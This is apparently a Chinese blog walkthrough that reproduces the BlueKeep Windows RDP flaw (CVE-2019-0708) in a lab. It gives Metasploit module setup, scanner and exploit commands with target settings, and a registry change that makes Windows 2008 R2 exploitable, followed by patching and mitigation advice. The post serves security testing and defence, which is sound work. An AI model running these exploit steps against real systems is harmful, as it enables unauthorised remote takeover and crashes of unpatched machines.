CVE-2019-0708

0x00 前言:

CVE-2019-0708漏洞已经出来三四个月了对应的poc也出现了很久 ,exp 还是没动静前段时间出了个蓝屏伪exp 不过肯定那些大厂手里早已经了有了真正的exp 今天突然Github上有人上传了exp 在这里得到消息后就紧跟着复现了一下 注意!!!蓝屏概率很大 请不要用在随意测试

漏洞概要

漏洞名称 Microsoft Windows Remote Desktop Services远程代码执行漏洞
威胁类型 远程代码执行 威胁等级 严重 漏洞ID CVE-2019-0708
利用场景 未经身份验证的攻击者可以通过发送特殊构造的数据包触发漏洞,可能导致远程无需用户验证控制系统。

受影响系统及应用版本

Windows  7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for Itanium-Based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

0x01 准备工具:

https://github.com/rapid7/metasploit-framework/

0x02 环境准备

   Kali              10.1.1.2  (攻击)
Win7 sp1/x64 10.1.1.3 (被攻击)
Win2008R2/x64 10.1.1.4 (被攻击)

0x03 复现开始:

使用如下命令一键安装metasploit-framework
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall 下载Reference中的攻击套件放置文件到msf的相应文件夹(如果已存在同名文件,直接覆盖即可)
1.cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/
2.rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
3.rdp_scanner.rb 替换 /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
4.cve_2019_0708_bluekeep.rb 替换 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

0x04 运行0708exp脚本是否成功

service postgresql start  ##启动msf数据库
msfconsole
reload_all
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce ##启动0708exp脚本 出现则证明成功导入rb文件


0x05 漏洞检验

漏洞检验poc  在19年5月份 官方就同步了0708的poc检测脚本
Msfconsole
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhost 10.1.1.3
show options
exploit

0x06 攻击利用

  use exploit/windows/rdp/cve_2019_0708_bluekeep_rce  ##进入模块
set rhost 10.1.1.3 ##设置目标
set target 2 ##设置级别 ps一开始设置target 3 vm那个,蓝屏了,后面看到群里大佬说设置2就没有问题了
exploit ##启动攻击



windows 2008 同样的利用方法

1.	首先修改 注册表某值为0
测试成功版本Windows 2008r2withsp1 english standard,vmare版本:15.1.0 build-13591040。 2008r2 withsp1 english standard需要修改注册表[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd\fDisableCam]值修改为0


2. 攻击同上 方式一样 不过概率很大为蓝屏

3.	 试了有不下30次 每次蓝屏 终于成功一次


0x07 修复方案

1. 目前软件厂商微软已经发布了漏洞相应的补丁:https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019- 0708#ID0EWIAC
Windows XP 及Windows 2003可以在以下链接下载补丁:https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708 2. 临时解决方案
如暂时无法更新补丁,可以通过在系统上启用网络及身份认证(NLA)以暂时规避该漏洞影响。
在企业外围防火墙阻断TCP端口3389的连接,或对相关服务器做访问来源过滤,只允许可信IP连接。
如无明确的需求,可禁用远程桌面服务。

0x08参考资料

https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0708#ID0EWIAC
https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/
https://www.qianxin.com/other/CVE-2019-0708
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0708#ID0EWIAC
https://github.com/busterb/metasploit-framework/blob/bluekeep/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

最新文章

  1. 第八章 交互技术,8.4 Weex 双11会场大规模应用的秒开实战和稳定性保障(作者:鬼道)
  2. Linux时间同步,ntpdate命令、ntpd服务详解
  3. spring笔记--通过注解(annotation)配置Bean
  4. Java并发编程核心方法与框架-TheadPoolExecutor的使用
  5. linux命令学习(1):grep 命令
  6. 在将 varchar 值 '1,2,3,4,5,6,7,8' 转换成数据类型 int 时失败。
  7. c++之路进阶——codevs1286(郁闷的出纳员)
  8. python [吐槽]关于nan类型时遇到的问题
  9. MySQL数据库的存储结构
  10. vs调试时底部输出调试信息“无法查找或打开 PDB 文件”解决办法
  11. 浅谈SQL优化入门:2、等值连接和EXPLAIN(MySQL)
  12. python2 使用pip安装psycopg2出现错误:Command "python setup.py egg_info" failed with error code 1 in /tmp/pip-install-mvzdNj/psycopg2/
  13. 5个数组Array方法: indexOf、filter、forEach、map、reduce使用实例
  14. 我的C#跨平台之旅(四):使用AOP(filter、attribute)进行系统增强
  15. thymeleaf学习笔记:总结
  16. Winform 设置控件值
  17. 设置泛域名和设置IIS下面不同网站通过不同域名公用80端口的操作指引
  18. iOS transform解决连续多次旋转缩放,实现图片旋转缩放效果
  19. Flow类注释解读
  20. cogs1685 【NOI2014】魔法森林 Link-Cut Tree

热门文章

  1. ELK系列(二):.net core中使用ELK
  2. Python3行代码之——截图工具
  3. Zeppelin 学习笔记之 Zeppelin安装和elasticsearch整合
  4. Curl的移植编译以及注意事项
  5. 阿里云DLA工具 查询tablestore数据
  6. Inkscape 旋转并复制
  7. request.getAttribute()和request.getParameter()
  8. python编程基础之二十三
  9. Java工程师学习指南(中级篇)
  10. 【LeetCode刷题】——两数之和.1